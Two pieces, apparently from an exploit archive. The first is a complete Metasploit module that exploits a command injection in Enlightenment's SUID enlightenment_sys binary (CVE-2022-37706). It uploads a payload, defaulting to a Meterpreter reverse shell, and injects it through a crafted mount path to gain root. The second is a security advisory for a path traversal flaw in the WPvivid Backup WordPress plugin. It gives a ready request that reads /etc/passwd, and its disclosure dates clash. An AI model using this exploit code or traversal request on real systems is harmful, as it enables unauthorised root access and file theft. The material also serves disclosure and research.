<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = GreatRanking include Msf::Post::Linux::Priv include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Ubuntu Enlightenment Mount Priv Esc', 'Description' => %q{ This module exploits a command injection within Enlightenment's enlightenment_sys binary. This is done by calling the mount command and feeding it paths which meet all of the system requirements, but execute a specific path as well due to a semi-colon being used. This module was tested on Ubuntu 22.04.1 X64 Desktop with enlightenment 0.25.3-1 (current at module write time) }, 'License' => MSF_LICENSE, 'Author' => [ 'h00die', # msf module 'Maher Azzouzi' # discovery, poc ], 'Platform' => [ 'linux' ], 'Arch' => [ ARCH_X86, ARCH_X64 ], 'SessionTypes' => [ 'shell', 'meterpreter' ], 'Targets' => [[ 'Auto', {} ]], 'Privileged' => true, 'References' => [ [ 'URL', 'https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit' ], [ 'URL', 'https://twitter.com/maherazz2/status/1569665311707734023' ], [ 'CVE', '2022-37706' ] ], 'DisclosureDate' => '2022-09-13', 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp', 'PrependFork' => true, # so we can exploit multiple times 'WfsDelay' => 10 }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [ARTIFACTS_ON_DISK] } ) ) register_advanced_options [ OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]) ] end def base_dir datastore['WritableDir'].to_s end def find_enlightenment_sys enlightenment_sys = '/usr/lib/x86_64-linux-gnu/enlightenment/utils/enlightenment_sys' if file_exist?(enlightenment_sys) vprint_good("Found binary: #{enlightenment_sys}") if setuid?(enlightenment_sys) vprint_good("It's set for SUID") # at this time there doesn't seem to be any other way to check if it'll be exploitable # like a version number as a patch hasn't been released yet return enlightenment_sys else return nil end else vprint_status('Manually searching for exploitable binary') # https://github.com/MaherAzzouzi/CVE-2022-37706-LPE-exploit/blob/main/exploit.sh#L7 binary = cmd_exec('find / -name enlightenment_sys -perm -4000 2>/dev/null | head -1') vprint_good("Found SUID binary: #{enlightenment_sys}") unless binary.nil? return binary end end def check enlightenment_sys = find_enlightenment_sys return CheckCode::Safe('An exploitable enlightenment_sys was not found on the system') if enlightenment_sys.nil? CheckCode::Appears end def exploit # Check if we're already root if is_root? && !datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override' end # Make sure we can write our exploit and payload to the local system unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end print_status('Finding enlightenment_sys') enlightenment_sys = find_enlightenment_sys if enlightenment_sys.nil? fail_with Failure::NotFound, "#{base_dir} is not writable" end # Upload payload executable payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}" upload_and_chmodx payload_path, generate_payload_exe dev_path = "/dev/../tmp/;#{payload_path}" register_files_for_cleanup(payload_path) print_status('Creating folders for exploit') cmd_exec('rm -rf /tmp/net; mkdir -p /tmp/net') cmd_exec("mkdir -p \"#{dev_path}\"") # Launch exploit with a timeout. We also have a vprint_status so if the user wants all the # output from the exploit being run, they can optionally see it enlightenment_sys = find_enlightenment_sys print_status 'Launching exploit...' cmd_exec("#{enlightenment_sys} /bin/mount -o noexec,nosuid,utf8,nodev,iocharset=utf8,utf8=0,utf8=1,uid=$(id -u), \"#{dev_path}\" /tmp///net", nil, datastore['WfsDelay']) end end </code></pre>

<pre><code>=====[ Tempest Security Intelligence - ADV-15/2022 ]========================== Wordpress plugin - WPvivid Backup - Version < 0.9.76 Author: Rodolfo Tavares Tempest Security Intelligence - Recife, Pernambuco - Brazil =====[ Table of Contents]================================================== * Overview * Detailed description * Timeline of disclosure * Thanks & Acknowledgements * References =====[ Vulnerability Information]============================================= * Class: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') ('Path Traversal') [CWE-22] * CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H * CVSS Base Score 7.2 =====[ Overview]======================================================== * System affected : Wordpress plugin - WPvivid Backup * Software Version : Version < 0.9.76 * Impacts : The plugin WPvivid Backup does not sanitise and validate a parameter before using it to read the content of a file, allowing high privilege users to read any file from the web server via a Traversal attack. =====[ Detailed description]================================================= * Steps to reproduce 1 - Authenticated as privilege user, copy the request below, change the placeholder {{nonce}} with a valid nonce: ``` https://example.com/wp-admin/admin-ajax.php?_wpnonce={{nonce}}&action=wpvivid_download_export_backup&file_name=../../../../../../../etc/passwd&file_size=922 ``` =====[ Timeline of disclosure]=============================================== 11/Aug/2022 - Responsible disclosure was initiated with the vendor. 15/Aug/2022 - WPvivid Support confirmed the issue. 16/Aug/2022 - WPvivid Support fix the issue. 08/Aug/2022 - CVEs was assigned and reserved as CVE-2022-2863. =====[ Thanks & Acknowledgements]======================================== * Tempest Security Intelligence [5] =====[ References ]===================================================== [1][ [ https://cwe.mitre.org/data/definitions/22.html]|https://cwe.mitre.org/data/definitions/22.html ]] [2][ [ https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a]|https://gist.github.com/rodnt/c6eb8c8237d6ea0583f1f7da139c742a [3][ [https://www.tempest.com.br|https://www.tempest.com.br/]] [4][ [ https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]|https://wpscan.com/vulnerability/cb6a3304-2166-47a0-a011-4dcacaa133e5]] ] [5][ [Thanks FXO,ACPM,MFPP]] =====[ EOF ]=========================================================== -- </code></pre>